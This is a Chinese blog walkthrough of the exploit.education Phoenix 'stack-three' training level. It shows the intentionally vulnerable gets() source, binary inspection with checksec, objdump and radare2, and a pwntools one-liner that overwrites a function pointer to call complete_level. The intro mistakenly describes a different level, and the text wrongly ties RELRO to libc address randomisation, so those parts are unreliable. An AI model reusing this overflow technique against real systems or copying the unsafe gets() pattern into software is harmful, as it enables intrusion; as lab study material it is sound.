exploit.education/stack-three

Posted on Edited on In ,

stack-two基本上于stack-one一样,只不过需要设置一个环境变量,程序是从环境变量中获取的值。

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
/*
 * phoenix/stack-three, by https://exploit.education
 *
 * The aim is to change the contents of the changeme variable to 0x0d0a090a
 *
 * When does a joke become a dad joke?
 *   When it becomes apparent.
 *   When it's fully groan up.
 *
 */

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

char *gets(char *);

void complete_level() {
  printf("Congratulations, you've finished " LEVELNAME " :-) Well done!\n");
  exit(0);
}

int main(int argc, char **argv) {
  struct {
    char buffer[64];
    volatile int (*fp)();
  } locals;

  printf("%s\n", BANNER);

  locals.fp = NULL;
  gets(locals.buffer);

  if (locals.fp) {
    printf("calling function pointer @ %p\n", locals.fp);
    fflush(stdout);
    locals.fp();
  } else {
    printf("function pointer remains unmodified :~( better luck next time!\n");
  }

  exit(0);
}

分析

main函数中并没有调用complete_level函数的地方,要完成这个关卡,需要想办法调用这个函数。
main函数中,可通过溢出gets函数,覆盖local.fp指针,将fp的值改变为complate_level函数的地址,就完成了。

实操

先查看一下二进制文件的信息:

1
2
3
4
5
6
7
8
9
user@phoenix-amd64:/opt/phoenix/amd64$ checksec ./stack-three 
[*] '/opt/phoenix/amd64/stack-three'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments
    RPATH:    '/opt/phoenix/x86_64-linux-musl/lib'

我们发现No RELRO,也就是没有地址重定位。
通过ldd命令也可以查看是否开启了地址重定位:

1
2
3
4
5
6
7
8
9
user@phoenix-amd64:/opt/phoenix/amd64$ ldd stack-three 
	linux-vdso.so.1 (0x00007ffff7ffa000)
	libc.so => /opt/phoenix/x86_64-linux-musl/lib/libc.so (0x00007ffff7b45000)
user@phoenix-amd64:/opt/phoenix/amd64$ ldd stack-three 
	linux-vdso.so.1 (0x00007ffff7ffa000)
	libc.so => /opt/phoenix/x86_64-linux-musl/lib/libc.so (0x00007ffff7b45000)
user@phoenix-amd64:/opt/phoenix/amd64$ ldd stack-three 
	linux-vdso.so.1 (0x00007ffff7ffa000)
	libc.so => /opt/phoenix/x86_64-linux-musl/lib/libc.so (0x00007ffff7b45000)

我们发现libc.so的地址没有变化。

然后就要找一下complete_level函数的地址,可以通过r2/objdump工具:
首先使用objdump命令:

1
2
user@phoenix-amd64:/opt/phoenix/amd64$ objdump -t ./stack-three | grep complete_level
000000000040069d g     F .text	0000000000000018 complete_level

使用radare2:

1
2
3
4
5
6
7
8
9
10
user@phoenix-amd64:/opt/phoenix/amd64$ r2 stack-three 
[0x00400530]> aaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze len bytes of instructions for references (aar)
[x] Analyze function calls (aac)
[ ] [*] Use -AA or aaaa to perform additional experimental analysis.
[x] Constructing a function name for fcn.* and sym.func.* functions (aan))
[0x00400530]> afl~complete_level
0x0040069d    1 24           sym.complete_level
[0x00400530]>

所以,我们要将fp覆盖为0x0040069d。那接下来的就简单了:

1
2
3
4
user@phoenix-amd64:/opt/phoenix/amd64$ python -c "from pwn import *;print 'A'*64+p64(0x0040069d)" | ./stack-three 
Welcome to phoenix/stack-three, brought to you by https://exploit.education
calling function pointer @ 0x40069d
Congratulations, you've finished phoenix/stack-three :-) Well done!

总结

  • checksec 查看二进制信息
  • objdump 查找符号表信息
  • r2 afl命令。(analyze function list)